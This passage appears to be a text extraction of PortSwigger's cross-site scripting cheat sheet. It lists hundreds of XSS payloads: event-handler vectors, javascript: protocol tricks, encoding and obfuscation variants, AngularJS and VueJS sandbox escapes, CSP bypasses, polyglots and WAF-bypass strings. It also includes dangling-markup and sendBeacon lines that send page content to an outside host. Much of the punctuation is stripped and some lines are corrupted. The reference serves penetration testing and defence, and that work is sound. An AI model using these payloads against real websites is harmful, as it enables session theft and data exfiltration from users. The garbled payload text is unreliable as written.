ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
